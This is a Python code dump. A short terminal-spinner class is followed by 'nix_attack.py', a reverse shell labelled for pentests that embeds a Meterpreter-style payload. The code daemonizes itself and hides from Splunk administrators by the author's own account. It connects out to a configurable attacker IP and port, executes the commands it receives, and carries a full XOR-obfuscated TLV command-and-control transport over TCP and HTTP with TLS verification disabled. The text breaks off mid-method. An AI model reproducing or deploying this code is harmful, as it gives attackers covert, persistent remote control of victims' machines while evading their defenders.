delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\': yield cursor
@staticmethod
def balloons_cursor():
while 1:
for cursor in '. o O @ *': yield cursor
@staticmethod
def changing_arrows():
while 1:
for cursor in '<^>v': yield cursor
def select_generator(self, generator):
        if generator is None:
generator = choice(['cursor',
'arrow',
'balloons'])
return generator
    def __init__(self, delay=None, generator=None):
        generator = self.select_generator(generator)
        if generator == 'cursor':
            self.spinner_generator = self.spinning_cursor()
        elif generator == 'arrow':
            self.spinner_generator = self.changing_arrows()
        elif generator == 'balloons':
            self.spinner_generator = self.balloons_cursor()
            if delay is None:
                delay = 0.2  # balloons look better at a slower default rate
        else:
            self.spinner_generator = self.spinning_cursor()
        if delay and float(delay):
            self.delay = delay
def run(self):
while self.spinning:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
self.spinning = True
threading.Thread(target=self.run).start()
def stop(self):
self.spinning = False
time.sleep(self.delay)
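# Minimal usage sketch (illustrative): run the spinner around a slow task.
if __name__ == '__main__':
    spinner = Spinner(delay=0.1, generator='arrow')
    spinner.start()
    time.sleep(2)  # stand-in for real work
    spinner.stop()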
|
nix_attack.py
|
#!/usr/bin/env python
#**************************************************************************#
# Filename: py_rev_shel.py (Created: 2016-08-18) #
# (Updated: 2016-10-02) #
# Info: #
# TBG Security Python Reverse Shell for pentests. #
# This will fork itself and detach from the parent Splunk process #
# so that Splunk does not hang while the reverse shell is running. #
# This also helps to avoid detection by Splunk admins. #
# Author: #
# Ryan Hays #
#**************************************************************************#
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
# Update
shell_type = "msf"
ipaddy = "<IP ADDRESS HERE>"
port = 4443
UMASK = 0
WORKDIR = "/"
MAXFD = 1024
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
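# The function below uses the classic Unix double-fork: the first fork plus
# setsid() detaches from the controlling terminal, the second fork ensures
# the daemon can never reacquire one; the grandchild then resets its working
# directory and umask and closes/redirects all file descriptors.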
def createdaemon():
try:
pid = os.fork()
    except OSError as e:
        raise Exception("%s [%d]" % (e.strerror, e.errno))
if pid == 0: # The first child.
os.setsid()
try:
pid = os.fork() # Fork a second child.
        except OSError as e:
            raise Exception("%s [%d]" % (e.strerror, e.errno))
if pid == 0: # The second child.
os.chdir(WORKDIR)
os.umask(UMASK)
else:
os._exit(0) # Exit parent (the first child) of the second child.
else:
os._exit(0) # Exit parent of the first child.
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
return 0
if __name__ == "__main__":
retCode = createdaemon()
procParams = """
return code = %s
process ID = %s
parent process ID = %s
process group ID = %s
session ID = %s
user ID = %s
effective user ID = %s
real group ID = %s
effective group ID = %s
""" % (retCode, os.getpid(), os.getppid(), os.getpgrp(), os.getsid(0),
os.getuid(), os.geteuid(), os.getgid(), os.getegid())
if shell_type.lower() == 'std':
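        # NOTE: this branch relies on Python 2-only APIs (os.popen3 was
        # removed in Python 3).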
so = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
so.connect((ipaddy, port))
except socket.error:
sys.exit(retCode)
tI = False
while not tI:
data = so.recv(1024)
if len(data) == 0:
tI = True
stdin, stdout, stderr, = os.popen3(data)
stdout_value = stdout.read() + stderr.read()
so.send(stdout_value)
elif shell_type.lower() == 'msf':
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
PAYLOAD_UUID = '606221c9f94dc57ccb90de849c6142d6'
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = (0)
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1 << 31) + (1 << 30) + (1 << 29) + (1 << 19) + (1 << 18) + (1 << 17) + (1 << 16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
def rand_byte():
return chr(random.randint(1, 255))
def rand_xor_key():
return ''.join(rand_byte() for _ in range(4))
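# Each outgoing packet is obfuscated with a fresh 4-byte XOR key; the key is
# sent reversed ahead of the payload so the peer can recover it (see
# Transport.send_packet and the _get_packet implementations below).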
def xor_bytes(key, data):
return ''.join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data)))
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
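    # Bitwise CRC-16 with polynomial 0x1021 (CCITT/XMODEM flavor) and a zero
    # initial register, computed over the data plus two padding bytes.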
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def inet_pton(family, address):
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress),
ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
    # fall through: returning ends the generator (raising StopIteration here
    # is a RuntimeError on Python 3.7+, per PEP 479)
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
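    # TLV wire format: 4-byte big-endian total length (header included),
    # 4-byte big-endian type, then the value encoded per its meta type.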
if len(args) == 2:
tlv = {'type': args[0], 'value': args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
@export
def tlv_pack_response(result, response):
response += tlv_pack(TLV_TYPE_RESULT, result)
response = struct.pack('>I', len(response) + 4) + response
return response
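# Roughly how responses are assembled (see create_response below); the method
# name here is only an example:
#     resp  = struct.pack('>I', PACKET_TYPE_RESPONSE)
#     resp += tlv_pack(TLV_TYPE_METHOD, 'core_machine_id')
#     resp  = tlv_pack_response(ERROR_SUCCESS, resp)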
# @export
class MeterpreterFile(object):
def __init__(self, file_obj):
self.file_obj = file_obj
def __getattr__(self, name):
return getattr(self.file_obj, name)
export(MeterpreterFile)
# @export
class MeterpreterSocket(object):
def __init__(self, sock):
self.sock = sock
def __getattr__(self, name):
return getattr(self.sock, name)
export(MeterpreterSocket)
# @export
class MeterpreterSocketClient(MeterpreterSocket):
pass
export(MeterpreterSocketClient)
# @export
class MeterpreterSocketServer(MeterpreterSocket):
pass
export(MeterpreterSocketServer)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l=None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l=None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
# @export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
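        # When enabled, write() waits up to 0.5s for the process to echo the
        # input back and silently consumes that echo from stdout.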
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
def write(self, channel_data):
self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value',
SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value',
SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value',
SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def get_packet(self):
self.request_retire = False
try:
pkt = self._get_packet()
except:
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def send_packet(self, pkt):
self.request_retire = False
try:
xor_key = rand_xor_key()
raw = xor_key[::-1] + xor_bytes(xor_key, pkt)
self._send_packet(raw)
except:
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and (
(sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
if user_agent:
opener.addheaders = [('User-Agent', user_agent)]
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
        self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
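        # single-iteration loop used as a breakable block while validating
        # the response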
for _ in range(1):
if packet == '':
break
if len(packet) < 12:
packet = None # looks corrupt
break
xor_key = packet[:4][::-1]
header = xor_bytes(xor_key, packet[4:12])
pkt_length, _ = struct.unpack('>II', header)
if len(packet) - 4 != pkt_length:
packet = None # looks corrupt
if not packet:
delay = 10 * self._empty_cnt
            if self._empty_cnt >= 10:
                delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return xor_bytes(xor_key, packet[12:])
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.run()
self.socket = None
def _get_packet(self):
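        # A full header is 12 bytes: a reversed 4-byte XOR key followed by
        # the XOR-obfuscated 8-byte (length, type) pair.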
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return ''
packet = self.socket.recv(12)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != 12:
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = packet[:4][::-1]
header = xor_bytes(xor_key, packet[4:12])
pkt_length, pkt_type = struct.unpack('>II', header)
pkt_length -= 8
packet = bytes()
while len(packet) < pkt_length:
packet += self.socket.recv(pkt_length - len(packet))
return xor_bytes(xor_key, packet)
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def debug_print(self, msg):
if DEBUGGING:
print(msg)
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
assert (isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
idx = self.next_channel_id
self.channels[idx] = channel
self.debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
self.debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
self.debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
self.debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.recv(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.accept()
server_addr = channel.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def _core_uuid(self, request, response):
